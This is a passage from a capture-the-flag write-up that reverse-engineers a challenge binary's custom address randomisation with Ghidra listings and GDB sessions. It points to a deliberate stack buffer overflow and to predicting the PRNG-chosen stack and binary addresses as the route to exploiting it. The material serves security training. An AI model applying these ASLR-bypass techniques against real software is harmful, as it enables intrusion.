So after the CALL, the address of the next instruction, i.e. where this function should return to (usually with RET), is on the top of the stack. This gets popped into EAX, but then we jump to EAX - *EDI + ESI. Given that we expect code around these parts to move execution to the new copy of the binary, this makes sense if EDI stores a pointer to the variable holding the current base address, and ESI is the new base address. Changing the function signature of this function we obtain the following decompile:

void jump_to_new_binary_location(void **current_base_ptr,void *new_base)
{
  uint retaddr;
  
                    /* WARNING: Could not recover jumptable at 0x0804920a. Too many branches */
                    /* WARNING: Treating indirect jump as call */
  (*(code *)((retaddr - (int)*current_base_ptr) + (int)new_base))();
  return;
}

Changing the function signature of transition_to_new_base_and_relocate_stack as well the end of the relocate function now looks acceptable:

  do {
    random_from_first_prng_raw = (longdouble)step_prng(prngs);
    random_address =
         (uint)(longlong)ROUND((double)((longdouble)4294967295.0 * random_from_first_prng_raw));
    binary_base_new = (byte *)(random_address & 0xfffff000);
                    /* mmap2(addr, length, prot, flags, fd, pgoffset) */
    address_mapped = (byte *)syscall(0xc0,binary_base_new,0x4000,3,0x22,0xffffffff,0);
  } while (binary_base_new != address_mapped);
  memcpy(binary_base_new,(byte *)binary_base,0x4000);
                    /* mprotect(start, len, prot) */
  syscall(0x7d,binary_base_new,0x3000,5,0,0,0);
  transition_to_new_base_and_relocate_stack(&binary_base,binary_base_new);

Let us continue with transition_to_new_base_and_relocate_stack. The function indeed relocates the stack, and is also split out as it’s own function by Ghidra even though it still uses the stack frame of relocate (but given the changing around of EBP, Ghidra presumably would not be able to out of the box recognize the locals anyway). This makes the decompile a mess that is very difficult to follow. I am thus going to mostly follow the listing view here. Note that when doing this challenge during a live contest, one has to decide where to spend time and it was not necessary to fully understand this function to solve this challenge. But now there is no live contest anymore, so I can satisfy my curiosity regarding how this works.

After the call to jump_to_new_binary_location, this is the next block:

08049211 89 e2           MOV        EDX,ESP
08049213 c1 ea 0c        SHR        EDX,0xc
08049216 42              INC        EDX
08049217 c1 e2 0c        SHL        EDX,0xc
0804921a 89 e1           MOV        ECX,ESP
                     LAB_0804921c                                    XREF[1]:     08049230(j)  
0804921c 8b 01           MOV        EAX,dword ptr [ECX]=>local_res0
0804921e 2b 07           SUB        EAX,dword ptr [current_base_ptr]
08049220 3d 00 40        CMP        EAX,0x4000
         00 00
08049225 77 04           JA         LAB_0804922b
08049227 01 f0           ADD        EAX,new_base
08049229 89 01           MOV        dword ptr [ECX]=>local_res0,EAX
                     LAB_0804922b                                    XREF[1]:     08049225(j)  
0804922b 83 c1 04        ADD        ECX,0x4
0804922e 39 d1           CMP        ECX,EDX
08049230 72 ea           JC         LAB_0804921c

Initially, ECX is set to the stack pointer, and EDX is set to the next higher address that is divisible by 1 << 0xc = 4096. The part after that is a loop, where after each iteration ECX is increased by 4 and the loop stops once ECX is not smaller than EDX anymore. What the loop does is loop over each doubleword in the part of the stack up to EDX, and if the value is an address pointing to the memory in which the binary was mapped to before, then the value is adjusted to instead point to the new mapping. Note that there is a bug here: We really should update the entire stack. Depending on e.g. the amount of environment variables etc. the current stack pointer could be just below a multiple of 0x1000 = 4096. In that case, we might not even update the return address of the relocate function, causing a crash on return.

The next block is the following.

08049232 2b 1f           SUB        EBX,dword ptr [current_base_ptr]
08049234 01 f3           ADD        EBX,new_base
08049236 83 c4 1c        ADD        ESP,0x1c

Here EBX is modified. What was the previous value and how can we interpret it? For this we have to go back to the start of the relocate function where we see

080490e0 53              PUSH       EBX
080490e1 e8 1c 09        CALL       __i686.get_pc_thunk.bx                           undefined __i686.get_pc_thunk.bx()
         00 00
080490e6 81 c3 d2        ADD        EBX,0x25d2
         25 00 00
080490ec 83 ec 58        SUB        ESP,0x58
080490ef 8b 83 0c        MOV        EAX,dword ptr [EBX + 0xc]=>prngs                 = NaP
         00 00 00

The function __i686.get_pc_thunk.bx is very simple: It places the address of the next instruction (i.e. the instruction it returns to) into the EBX register. This is used in position-independent code in order to calculate addresses of other parts of the binary. If the binary were loaded at the base address Ghidra uses to display the listing, then the value would be 0x080490e6 after the call. After adding 0x25d2 we get EBX = 0x804b6b8. If we check that address in Ghidra (or use readelf) we can see that this is exactly where the .got.plt section starts, which is followed by the .bss section. Most other functions in the binary also begin by (after saving EBX onto the stack) calling __i686.get_pc_thunk.bx and then adjusting EBX so that it points to .got.plt. EBX is then used to access globals, for example the instruction after the next one after the listing above is

080490ef 8b 83 0c        MOV        EAX,dword ptr [EBX + 0xc]=>prngs                 = NaP
         00 00 00

In which the address of the global prngs is obtained by adding 0xc to EBX. For reading more of the code it will be helpful to have a list of globals as offsets to .got.plt ready for reference:

  • 0x0c: prngs
  • 0x10: DAT_0804b6c8
  • 0x14: current_random
  • 0x18: stack_address
  • 0x1c: binary_base

Now let us get back to transition_to_new_base_and_relocate_stack. We had the following block.

08049232 2b 1f           SUB        EBX,dword ptr [current_base_ptr]
08049234 01 f3           ADD        EBX,new_base
08049236 83 c4 1c        ADD        ESP,0x1c

What this does is first to adjust EBX to now point towards .got.plt in the new, relocated, mapping for the binary. Next, 7 doublewords are released from the stack, which is just to remove the arguments to the syscall(0x7d,binary_base_new,0x3000,5,0,0,0); call in relocate, which had not been done yet.

The next block is then

08049239 6a 00           PUSH       0x0
0804923b 6a 00           PUSH       0x0
0804923d 6a 00           PUSH       0x0
0804923f 6a 00           PUSH       0x0
08049241 68 00 40        PUSH       0x4000
         00 00
08049246 ff b3 1c        PUSH       dword ptr [EBX + 0x1c]
         00 00 00
0804924c 6a 5b           PUSH       0x5b
0804924e e8 da fd        CALL       syscall                                          undefined4 syscall(uint number, 
         ff ff

This is a call to munmap(binary_base, 0x4000), so we now unmap the old mapping for the binary.

08049253 8b 45 d4        MOV        EAX,dword ptr [EBP + -0x2c]
08049256 83 c4 14        ADD        ESP,0x14
08049259 89 83 1c        MOV        dword ptr [EBX + 0x1c],EAX
         00 00 00

As ESP-relative addressing is not used (the stack is either used by addressing relative to EBP, or with PUSH/POP), we will ignore the ESP adjustments. To understand what EAX will be after the first instruction we have to look back to relocate and find the last time a write to EBP - 0x2c happens. The way Ghidra names locals on the stack this will then be local_30. We find that EAX will here get the value of binary_base_new. We then store this in the global binary_base.

0804925f 8b 83 0c        MOV        EAX,dword ptr [EBX + 0xc]
         00 00 00
08049265 83 c0 44        ADD        EAX,0x44
08049268 50              PUSH       EAX
08049269 e8 d3 07        CALL       step_prng                                        undefined step_prng(prng_state *
         00 00
0804926e dc 4d b0        FMUL       qword ptr [EBP + -0x50]
08049271 d9 7d c6        FNSTCW     word ptr [EBP + -0x3a]
08049274 66 8b 45 c6     MOV        AX,word ptr [EBP + -0x3a]
08049278 dd 5d e0        FSTP       qword ptr [EBP + -0x20]
0804927b dd 45 e0        FLD        qword ptr [EBP + -0x20]
0804927e 80 cc 0c        OR         AH,0xc
08049281 66 89 45 c4     MOV        word ptr [EBP + -0x3c],AX
08049285 d9 6d c4        FLDCW      word ptr [EBP + -0x3c]
08049288 df 7d a8        FISTP      qword ptr [EBP + -0x58]
0804928b d9 6d c6        FLDCW      word ptr [EBP + -0x3a]
0804928e 8b 45 a8        MOV        EAX,dword ptr [EBP + -0x58]

The first three instructions push the address of prngs[1] to the stack. Then we call step_prng, so we get a random value from the second PRNG. This value is then multiplied with local_54, which we previously identified as being the precise value 255. The rest is then doing the same as what we saw in relocate, and at the end EAX will have the value of 255 times the return value of step_prng, converted to a 32-bit unsigned integer by rounding towards zero.

The next block is then the following.

                     LAB_08049291                                    XREF[1]:     080492b3(j)  
08049291 89 45 dc        MOV        dword ptr [EBP + -0x24],EAX
08049294 8b 45 dc        MOV        EAX,dword ptr [EBP + -0x24]
08049297 83 c4 10        ADD        ESP,0x10
0804929a 8b 93 0c        MOV        EDX,dword ptr [EBX + 0xc]
         00 00 00
080492a0 85 c0           TEST       EAX,EAX
080492a2 74 11           JZ         LAB_080492b5
080492a4 83 ec 0c        SUB        ESP,0xc
080492a7 52              PUSH       EDX
080492a8 e8 94 07        CALL       step_prng                                        undefined step_prng(prng_state *
         00 00
080492ad dd d8           FSTP       ST0
080492af 8b 45 dc        MOV        EAX,dword ptr [EBP + -0x24]
080492b2 48              DEC        EAX
080492b3 eb dc           JMP        LAB_08049291
                     LAB_080492b5                                    XREF[2]:     080492a2(j), 08049321(j)  

This is a loop in which the random value EAX from the previous block, which can be between 0 and 255, is the amount of times we call step_prng(prngs).

                     LAB_080492b5                                    XREF[2]:     080492a2(j), 08049321(j)  
080492b5 83 ec 0c        SUB        ESP,0xc
080492b8 ff b3 0c        PUSH       dword ptr [EBX + 0xc]
         00 00 00
080492be e8 7e 07        CALL       step_prng                                        undefined step_prng(prng_state *
         00 00
080492c3 dc 4d b8        FMUL       qword ptr [EBP + -0x48]
080492c6 83 c4 0c        ADD        ESP,0xc
080492c9 d9 7d c6        FNSTCW     word ptr [EBP + -0x3a]
080492cc 6a 00           PUSH       0x0
080492ce 6a ff           PUSH       -0x1
080492d0 66 8b 45 c6     MOV        AX,word ptr [EBP + -0x3a]
080492d4 6a 22           PUSH       0x22
080492d6 dd 5d e0        FSTP       qword ptr [EBP + -0x20]
080492d9 dd 45 e0        FLD        qword ptr [EBP + -0x20]
080492dc 80 cc 0c        OR         AH,0xc
080492df 6a 03           PUSH       0x3
080492e1 66 89 45 c4     MOV        word ptr [EBP + -0x3c],AX
080492e5 d9 6d c4        FLDCW      word ptr [EBP + -0x3c]
080492e8 df 7d a8        FISTP      qword ptr [EBP + -0x58]
080492eb d9 6d c6        FLDCW      word ptr [EBP + -0x3a]
080492ee ff b3 10        PUSH       dword ptr [EBX + 0x10]
         00 00 00
080492f4 8b 45 a8        MOV        EAX,dword ptr [EBP + -0x58]
080492f7 89 45 dc        MOV        dword ptr [EBP + -0x24],EAX
080492fa 8b 45 dc        MOV        EAX,dword ptr [EBP + -0x24]
080492fd 25 00 f0        AND        EAX,0xfffff000
         ff ff
08049302 89 45 d4        MOV        dword ptr [EBP + -0x2c],EAX
08049305 8b 45 d4        MOV        EAX,dword ptr [EBP + -0x2c]
08049308 50              PUSH       EAX
08049309 68 c0 00        PUSH       0xc0
         00 00
0804930e e8 1a fd        CALL       syscall                                          undefined4 syscall(uint number, 
         ff ff

Next we call step_prng(prngs) another time, but this time we use the output. The handling of the floating point numbers is again very similar to what we just discussed, just this time we multiply with a stored 4294967295 from the stack. The part depending on the return value of step_prng ultimately writes the obtained unsigned int (for details about what the multiplications and rounding does, see the section on get_random) to EBP - 0x58 and EBP - 0x24. Then EAX and EBO - 0x2c become this value rounded down to the next value divisible by 4096. Interspersed with all this, the arguments to a syscall are pushed to the stack. This call ends up being mmap2(random value, DAT_0804b6c8, 3, 0x22, -1, 0). So we mmap at the random address, of length DAT_0804b6c8, which we thus should rename stack_size.

08049313 83 c4 20        ADD        ESP,0x20
08049316 89 45 d8        MOV        dword ptr [EBP + -0x28],EAX
08049319 8b 55 d4        MOV        EDX,dword ptr [EBP + -0x2c]
0804931c 8b 45 d8        MOV        EAX,dword ptr [EBP + -0x28]
0804931f 39 c2           CMP        EDX,EAX
08049321 75 92           JNZ        LAB_080492b5
08049323 8b 45 d4        MOV        EAX,dword ptr [EBP + -0x2c]
08049326 51              PUSH       ECX
08049327 ff b3 10        PUSH       dword ptr [EBX + 0x10]
         00 00 00
0804932d ff b3 18        PUSH       dword ptr [EBX + 0x18]
         00 00 00
08049333 50              PUSH       EAX
08049334 e8 50 fd        CALL       memcpy                                           void memcpy(byte * dst, byte * s
         ff ff

The return value of the previous syscall is checked against the requested address; if it differs, we jump back and try again (again, just like in relocate). Then we call memcp(new_stack_address, stack_address, stack_size), where new_stack_address is the random address we mapped. We thus copy the stack to the newly mapped memory.

08049339 8b 8b 10        MOV        ECX,dword ptr [EBX + 0x10]
         00 00 00
0804933f 8b 55 d4        MOV        EDX,dword ptr [EBP + -0x2c]
08049342 83 c4 10        ADD        ESP,0x10
08049345 8b 83 18        MOV        EAX,dword ptr [EBX + 0x18]
         00 00 00
0804934b 8d 3c 08        LEA        current_base_ptr,[EAX + ECX*0x1]
0804934e 89 7d a8        MOV        dword ptr [EBP + -0x58],current_base_ptr
             LAB_08049351                                    XREF[1]:     08049371(j)  
08049351 8b 75 d4        MOV        new_base,dword ptr [EBP + -0x2c]
08049354 01 ce           ADD        new_base,ECX
08049356 39 f2           CMP        EDX,new_base
08049358 74 19           JZ         LAB_08049373
0804935a 8b 32           MOV        new_base,dword ptr [EDX]
0804935c 39 c6           CMP        new_base,EAX
0804935e 72 0e           JC         LAB_0804936e
08049360 3b 75 a8        CMP        new_base,dword ptr [EBP + -0x58]
08049363 73 09           JNC        LAB_0804936e
08049365 8b 7d d4        MOV        current_base_ptr,dword ptr [EBP + -0x2c]
08049368 29 c7           SUB        current_base_ptr,EAX
0804936a 01 f7           ADD        current_base_ptr,new_base
0804936c 89 3a           MOV        dword ptr [EDX],current_base_ptr
                     LAB_0804936e                                    XREF[2]:     0804935e(j), 08049363(j)  
0804936e 83 c2 04        ADD        EDX,0x4
08049371 eb de           JMP        LAB_08049351
                     LAB_08049373                                    XREF[1]:     08049358(j)  

This is a loop. Before the loop starts we set ECX = stack_size, EDX = new_stack_address, and EAX = stack_address. What Ghidra calls current_base_ptr is just the register EDI that is being reused, and new_base is ESI. For some reason Ghidra does not allow splitting this out as a new variable or telling it to forget the name, or at least I did not figure out how to do it. But we can just edit the listing here in the writeup:

08049339 8b 8b 10        MOV        ECX,dword ptr [EBX + 0x10]
         00 00 00
0804933f 8b 55 d4        MOV        EDX,dword ptr [EBP + -0x2c]
08049342 83 c4 10        ADD        ESP,0x10
08049345 8b 83 18        MOV        EAX,dword ptr [EBX + 0x18]
         00 00 00
0804934b 8d 3c 08        LEA        EDI,[EAX + ECX*0x1]
0804934e 89 7d a8        MOV        dword ptr [EBP + -0x58],EDI
             LAB_08049351                                    XREF[1]:     08049371(j)  
08049351 8b 75 d4        MOV        ESI,dword ptr [EBP + -0x2c]
08049354 01 ce           ADD        ESI,ECX
08049356 39 f2           CMP        EDX,ESI
08049358 74 19           JZ         LAB_08049373
0804935a 8b 32           MOV        ESI,dword ptr [EDX]
0804935c 39 c6           CMP        ESI,EAX
0804935e 72 0e           JC         LAB_0804936e
08049360 3b 75 a8        CMP        ESI,dword ptr [EBP + -0x58]
08049363 73 09           JNC        LAB_0804936e
08049365 8b 7d d4        MOV        EDI,dword ptr [EBP + -0x2c]
08049368 29 c7           SUB        EDI,EAX
0804936a 01 f7           ADD        EDI,ESI
0804936c 89 3a           MOV        dword ptr [EDX],EDI
                     LAB_0804936e                                    XREF[2]:     0804935e(j), 08049363(j)  
0804936e 83 c2 04        ADD        EDX,0x4
08049371 eb de           JMP        LAB_08049351
                     LAB_08049373                                    XREF[1]:     08049358(j)  

EDI is set to stack_address + stack_size. In the loop EDX gets incremented until it hits new_stack_address + stack_size. In each iteration, we load the value at EDX (so one of the doublewords on the new stack) into ESI. Then we check whether this is bigger or equal to EAX = stack_address and also smaller than stack+address + stack+size. If it is, then this means the stack contained what looks like a pointer to somewhere in the old stack. That pointer is then adjusted to instead point to the new stack.

                     LAB_08049373                                    XREF[1]:     08049358(j)  
08049373 8b 55 d4        MOV        EDX,dword ptr [EBP + -0x2c]
08049376 29 c4           SUB        ESP,EAX
08049378 01 d4           ADD        ESP,EDX
0804937a 29 c5           SUB        EBP,EAX
0804937c 01 d5           ADD        EBP,EDX
0804937e 52              PUSH       EDX
0804937f 6a 00           PUSH       0x0
08049381 6a 00           PUSH       0x0
08049383 6a 00           PUSH       0x0
08049385 6a 00           PUSH       0x0
08049387 51              PUSH       ECX
08049388 50              PUSH       EAX
08049389 6a 5b           PUSH       0x5b
0804938b e8 9d fc        CALL       syscall                                          undefined4 syscall(uint number, 
         ff ff
08049390 8b 45 d4        MOV        EAX,dword ptr [EBP + -0x2c]
08049393 83 c4 14        ADD        ESP,0x14
08049396 89 83 18        MOV        dword ptr [EBX + 0x18],EAX
         00 00 00

The first five instructions now adjust ESP and EBP to point to the new stack. Then the syscall munmap(old_stack_address, stack_size) is made. Finally, the new stack address is written to the global stack_address.

0804939c 8b 83 0c        MOV        EAX,dword ptr [EBX + 0xc]
         00 00 00
080493a2 83 c0 44        ADD        EAX,0x44
080493a5 50              PUSH       EAX
080493a6 e8 96 06        CALL       step_prng                                        undefined step_prng(prng_state *
         00 00
080493ab dc 4d b0        FMUL       qword ptr [EBP + -0x50]
080493ae d9 7d c6        FNSTCW     word ptr [EBP + -0x3a]
080493b1 66 8b 45 c6     MOV        AX,word ptr [EBP + -0x3a]
080493b5 dd 5d e0        FSTP       qword ptr [EBP + -0x20]
080493b8 dd 45 e0        FLD        qword ptr [EBP + -0x20]
080493bb 80 cc 0c        OR         AH,0xc
080493be 66 89 45 c4     MOV        word ptr [EBP + -0x3c],AX
080493c2 d9 6d c4        FLDCW      word ptr [EBP + -0x3c]
080493c5 df 7d b0        FISTP      qword ptr [EBP + -0x50]
080493c8 d9 6d c6        FLDCW      word ptr [EBP + -0x3a]
080493cb 8b 45 b0        MOV        EAX,dword ptr [EBP + -0x50]

This snipped is identical to one we already had in this function: It calls step_prng with the second PRNG, and converts the return value to a random value from 0 to 255 in EAX.

                     LAB_080493ce                                    XREF[1]:     080493f0(j)  
080493ce 89 45 dc        MOV        dword ptr [EBP + -0x24],EAX
080493d1 8b 55 dc        MOV        EDX,dword ptr [EBP + -0x24]
080493d4 83 c4 10        ADD        ESP,0x10
080493d7 8b 83 0c        MOV        EAX,dword ptr [EBX + 0xc]
         00 00 00
080493dd 85 d2           TEST       EDX,EDX
080493df 74 11           JZ         LAB_080493f2
080493e1 83 ec 0c        SUB        ESP,0xc
080493e4 50              PUSH       EAX
080493e5 e8 57 06        CALL       step_prng                                        undefined step_prng(prng_state *
         00 00
080493ea dd d8           FSTP       ST0
080493ec 8b 45 dc        MOV        EAX,dword ptr [EBP + -0x24]
080493ef 48              DEC        EAX
080493f0 eb dc           JMP        LAB_080493ce

This continues being identical to previous instructions, and is a loop that calls step_prng(prngs) EAX many times.

                     LAB_080493f2                                    XREF[1]:     080493df(j)  
080493f2 83 ec 0c        SUB        ESP,0xc
080493f5 50              PUSH       EAX
080493f6 e8 46 06        CALL       step_prng                                        undefined step_prng(prng_state *
         00 00
080493fb dc 4d b8        FMUL       qword ptr [EBP + -0x48]
080493fe 83 c4 10        ADD        ESP,0x10
08049401 d9 7d c6        FNSTCW     word ptr [EBP + -0x3a]
08049404 66 8b 45 c6     MOV        AX,word ptr [EBP + -0x3a]
08049408 dd 5d e0        FSTP       qword ptr [EBP + -0x20]
0804940b dd 45 e0        FLD        qword ptr [EBP + -0x20]
0804940e 80 cc 0c        OR         AH,0xc
08049411 66 89 45 c4     MOV        word ptr [EBP + -0x3c],AX
08049415 d9 6d c4        FLDCW      word ptr [EBP + -0x3c]
08049418 df 7d b8        FISTP      qword ptr [EBP + -0x48]
0804941b d9 6d c6        FLDCW      word ptr [EBP + -0x3a]
0804941e 8b 45 b8        MOV        EAX,dword ptr [EBP + -0x48]
08049421 89 83 14        MOV        dword ptr [EBX + 0x14],EAX
         00 00 00

This is nearly identical to what we had previously: A call to step_prng(prngs) is made, and the return value multiplied by 4294967295 and rounded down. This time the result is written at EBP - 0x48, and the global current_random.

Now we finally arrived at the last block:

08049427 8d 65 f4        LEA        ESP,[EBP + -0xc]
0804942a 5b              POP        EBX
0804942b 5e              POP        ESI
0804942c 5f              POP        EDI
0804942d 5d              POP        EBP
0804942e c3              RET

This is just a standard function ending, restoring registers, releasing the stack frame, and returning.

Overview of relocate

Here is an overview of what relocate does:

  1. Generate a random number between 0 and 255 from the second PRNG and step the first one that many times.
  2. Get a random address from the first PRNG, map it, and copy the binary there. If the address can’t be mapped, try again.
  3. Continue execution in the new copy of the binary.
  4. Adjust doublewords on the stack within the same page as ESP that could have been pointers to the old mapped binary and adjust them to point to the new mapping. Also start using globals from the new mapping instead of the old one, and then unmap the old mapping for the binary.
  5. Update the global binary_base.
  6. Generate a random number between 0 and 255 from the second PRNG and step the first one that many times.
  7. Get a random address from the first PRNG, map it, and copy the stack there. If the address can’t be mapped, try again.
  8. Adjust all doublewords on the stack that could have been pointers to the old stack and adjust them to point to the new mapping.
  9. Adjust ESP and EBP to use the new stack, update the global stack_address, and unmap the old mapping for the stack.
  10. Generate a random number between 0 and 255 from the second PRNG and step the first one that many times.
  11. Generate a random 32-bit integer using the first PRNG and store it in the global current_random.

stack_smash

The last menu-function we have not looked into yet and that does something relevant is the one promising us to be able to smash the stack. After renaming variables and function this is the decompile:

void stack_smash(void)
{
  byte buf [10];
  
  print("Input buffer is 10 bytes in size. Accepting 100 bytes of data.\n");
  print(
       "This will crash however the location of the stack and binary are unknown to stop code execut ion\n"
       );
  relocate();
  relocate();
  read(buf,100);
  relocate();
  return;
}

The read function we haven’t looked at yet, which we thus should do next.

read

This function looks like this

int read(byte *buf,uint num)
{
  int num_read;
  int i;
  
  i = 0;
LAB_080494d1:
  do {
    num_read = syscall(3,0,buf,num - i,0,0,0);
    if (num_read != -1) {
      i = i + num_read;
      if (i < (int)num) goto LAB_080494d1;
      for (i = 0; i < num_read + -1; i = i + 1) {
        step_prng(prngs);
      }
LAB_0804951f:
      relocate();
      return num_read;
    }
    if ((int)num <= i) goto LAB_0804951f;
  } while( true );
}

The syscall here is read(0, buf, num - i). So there is a loop that reads up to num bytes into the buffer, aborting if the read syscall fails. Once num bytes have been read, the first PRNG is advanced as many times as the number of bytes the last read call actually read. This means that the number of times is not quite deterministic, it can depend on delays in transmitting our data to the remote. However, it seems likely that if we send all num bytes at once, that all will be read in one go. Alternatively one could send num-1 bytes, then wait long enough to ensure these bytes have already been read, then send the last byte. After advancing the PRNG, relocate is called once.

So stack_smash indeed gives us a buffer overflow on the stack, but due to relocate being called twice before the return, we can not use binary and stack addresses from the view_state menu option, we will need to predict addresses by breaking the PRNGs.

entry again

entry now looks as follows:

void processEntry entry(void)
{
  undefined4 uVar1;
  undefined4 extraout_EDX;
  undefined4 uVar2;
  undefined4 uVar3;
  
  binary_base = &Elf32_Ehdr_08048000;
  current_random = 0;
  FUN_08049780();
  uVar3 = 0;
  uVar2 = 0xffffffff;
  uVar1 = extraout_EDX;
  prngs = (prng_state *)syscall(0xc0,0,0x1000,3,0x22,0xffffffff,0);
  FUN_08049a06(prngs,uVar2,uVar3,uVar1);
  FUN_08049a06(prngs + 1);
  FUN_0804952e();
  relocate();
  do {
    uVar1 = FUN_080495a4();
    switch(uVar1) {
    case 0:
      syscall(1,0,0,0,0,0,0);
    default:
      print("Unknown command\n");
      break;
    case 1:
      print_info_text();
      break;
    case 2:
      change_random();
      break;
    case 3:
      view_state();
      break;
    case 4:
      stack_smash();
      break;
    case 5:
      get_random();
    }
  } while( true );
}

While we understand all the menu options now, there are some calls before the loop that presumably set up the program, and then in the loop there is a function that obtains the option the user chooses. We will now go through them.

set_stack_address_and_size

The decompile of FUN_08049780 looks like this, after cleaning it up:

void set_stack_address_and_size(void)
{
  int r;
  uint some_address_on_the_stack;
  undefined4 ***helper_on_stack;
  
  helper_on_stack = &helper_on_stack;
  some_address_on_the_stack = (uint)helper_on_stack & 0xfffff000;
  stack_address = some_address_on_the_stack;
  while( true ) {
                    /* mprotect(stack_address, 0x1000, PROT_READ | PROT_WRITE) */
    r = syscall(0x7d,stack_address,0x1000,3,0,0,0);
    if (r != 0) break;
    stack_address = stack_address - 0x1000;
  }
  stack_address = stack_address + 0x1000;
  while( true ) {
    r = syscall(0x7d,some_address_on_the_stack,0x1000,3,0,0,0);
    if (r != 0) break;
    some_address_on_the_stack = some_address_on_the_stack + 0x1000;
  }
  stack_size = some_address_on_the_stack - stack_address;
  return;
}

So an address on the stack is obtained, and then we attempt to use mprotect on 0x1000 byte long ranges of the stack, going downwards and upwards, until we found the limits of the mapping, in order to set the stack_address and stack_size globals correctly.

initialize_prng_random

Next, the function FUN_08049a06 is called twice at the start of entry, once for each of the two PRNGs, and is used to initialize the state with random data.

void initialize_prng_random(prng_state *prng_)
{
  prng_->index = 0;
                    /* getrandom(prng_->state, 0x40, 0) */
  syscall(0x163,prng_->state,0x40,0,0,0,0);
  return;
}

memset

The function FUN_080495a4 (that is used to make the user choose a menu option) calls two functions FUN_080490c9 and FUN_0804942f that we will look at first. The first of those looks like this after cleaning it up:

void memset(byte *s,byte c,uint n)
{
  for (; n != 0; n = n - 1) {
    *s = c;
    s = s + 1;
  }
  return;
}

So this is clearly memset.

read_and_step

FUN_0804942f looks like this:

int read_and_step(char *buf,int max_num_to_read,char breakchar)
{
  int syscall_ret;
  int num_read;
  int i;
  char input_char;
  undefined4 uStack_14;
  
  num_read = 0;
  uStack_14 = 0x804943c;
  input_char = '\0';
  do {
    while (syscall_ret = syscall(3,0,&input_char,1,0,0,0), syscall_ret == -1) {
      if ((max_num_to_read <= num_read) || (input_char == breakchar)) goto LAB_0804948d;
    }
    if (input_char == breakchar) break;
    buf[num_read] = input_char;
    num_read = num_read + 1;
  } while (num_read < max_num_to_read);
LAB_0804948d:
  for (i = 0; i < num_read + -1; i = i + 1) {
    step_prng(prngs);
  }
  relocate();
  return num_read;
}

A single character is read in from stdin, until the character in the third argument is reached, or the total number of characters were read reaches the second argument. The characters is stored in the first argument, and the first PRNG is stepped the num_read - 1 times.

The FUN_080495a4 function can now be made to look as follows:

int menu(void)
{
  int choice;
  char choice_str [5];
  
  choice_str[1] = -0x4f;
  choice_str[2] = -0x6b;
  choice_str[3] = '\x04';
  choice_str[4] = '\b';
  print("Main Menu\n");
  print("---------\n");
  print("1. Display info\n");
  print("2. Change random\n");
  print("3. View state info\n");
  print("4. Test stack smash\n");
  print("5. Get random values\n");
  print("-------\n");
  print("0. Quit\n");
  memset((byte *)choice_str,0,5);
  read_and_step(choice_str,3,'\n');
  print(choice_str);
  choice = (int)(char)(choice_str[0] - 0x30U);
  if (9 < (byte)(choice_str[0] - 0x30U)) {
    choice = -1;
  }
  return choice;
}

So the menu is printed, a buffer for the string read from the user is set to zero and then read in (using the previous function, that also steps the first PRNG), and then the choice is converted to an integer and returned.

entry, last time

For completeness, here is how entry looks at the end:

void processEntry entry(void)
{
  int choice;
  
  binary_base = &Elf32_Ehdr_08048000;
  current_random = 0;
  set_stack_address_and_size();
                    /* mmap2(0, 0x1000, 3, 0x22, ...) */
  prngs = (prng_state *)syscall(0xc0,0,0x1000,3,0x22,0xffffffff,0);
  initialize_prng_random(prngs);
  initialize_prng_random(prngs + 1);
  print_welcome();
  relocate();
  do {
    choice = menu();
    switch(choice) {
    case 0:
      syscall(1,0,0,0,0,0,0);
    default:
      print("Unknown command\n");
      break;
    case 1:
      print_info_text();
      break;
    case 2:
      change_random();
      break;
    case 3:
      view_state();
      break;
    case 4:
      stack_smash();
      break;
    case 5:
      get_random();
    }
  } while( true );
}

Dynamic debugging

In the previous section we went through the entire binary and reversed it statically. In a contest setting it would of course be prudent to speed up the process with dynamic debugging, as well as using it to confirm the findings. As the binary constantly relocates itself, this makes just using GDB directly a little more difficult however. During the contest zzz produced a patched version of the binary that did not carry out the relocation, which was very helpful to debug the x87 parts. However, such patching can cause differences in the behavior of the binary, for example by missing invocations of step_prng. My goal for this writeup was thus to do things differently and be able to debug an unpatched binary.

Debug symbols

Given that we have identified the various functions statically already, it would be useful to access the symbols in GDB. To do this, we can use Ghidra2Dwarf. Due to the relocation, we can’t really use it much in this case though.

Avoiding the crash due to the bug in transition_to_new_base_and_relocate_stack

Recall the bug in transition_to_new_base_and_relocate_stack that can cause a crash depending on the current size of the stack. In my case I actually hit this bug in GDB, with the binary crashing when attempting to return from that function, because the return address had not been updated, as the walking-over-the-stack-and-adjusting-addresses-loop had stopped at a lower address. For solving the challenge on the remote there really isn’t anything we can do except hope that the environment happens to be such that the binary does not immediately crash before the first user interaction (unlikely, as the admins would hopefully notice that). If it happens locally, then a simple fix is to remove enough environment variables. GPT4 suggested to me to run python -c 'import os; print("\n".join("unset environment " + x for x in os.environ.keys()))' > unsetenv.gdb to generate the GDB commands to unset all environment variables, and then run GDB with gdb -x unsetenv.gdb ./ifuckup_dbg, and this solves the problem.

The problem with relocations

If we just try to use GDB directly, by running gdb ./ifuckup_dbg, and setting a breakpoint at get_random, then we will get something like the following:

pwndbg> break *0x08049813
Breakpoint 1 at 0x8049813: file ./ifuckup_dbg.c, line 480.
pwndbg> run
Starting program: /home/user/learning/2023/ifuckup/ifuckup_dbg
Welcome to Improved Fully Unguessable Convoluted Kinetogenic Userspace Pseudoransomization, the new and improved ASLR.
This app is to help prove the benefits of I.F.U.C.K.U.P.
Main Menu
---------
1. Display info
2. Change random
3. View state info
4. Test stack smash
5. Get random values
-------
0. Quit
5
5
Program received signal SIGTRAP, Trace/breakpoint trap.
Cannot remove breakpoints because program is no longer writable.
Further execution is probably impossible.
0xe1a10814 in ?? ()
───[ BACKTRACE ]───
 ► f 0 0xe1a10814
   f 1      0x1
───────────────────
pwndbg> c
Continuing.
Random Values:
b8555984 46ffe1e0 d60a9877 d28ff03a - f6580fc7 c75ece10 4a5b13b4 48920a21
e256802d 7cd66546 eeb36ff4 f6190a28 - 597c8d22 aa5664fd a568c7fe 82b95684
9aab8612 bf110191 de114872 957aed52 - 49a23243 61d825fb 089cb390 ae0c5aaf
07f324c1 e6537ecc 6e35d4b8 cda2a890 - 0610e2c0 39387b67 42dad6bb d68a392b
2a53e634 28997255 deaa33cf 7f4ff0f0 - 9c9d6968 b4b9d832 08263276 01b85c7a
c7395b3c ad0e1ddf 89ade5da b47ad7fb - a72126bf d44ea9b1 92f53a96 8189be6e
2f47ff6f 4aa96134 7c072762 fd7822d2 - 84977b0f d23eea5f 43b7fa9f ff396d68
042ffb37 a4164e3f 67950cb2 5999c2ff - 3eadd0c7 2b367d2a e8805884 7fd5d1ef

Program received signal SIGSEGV, Segmentation fault.
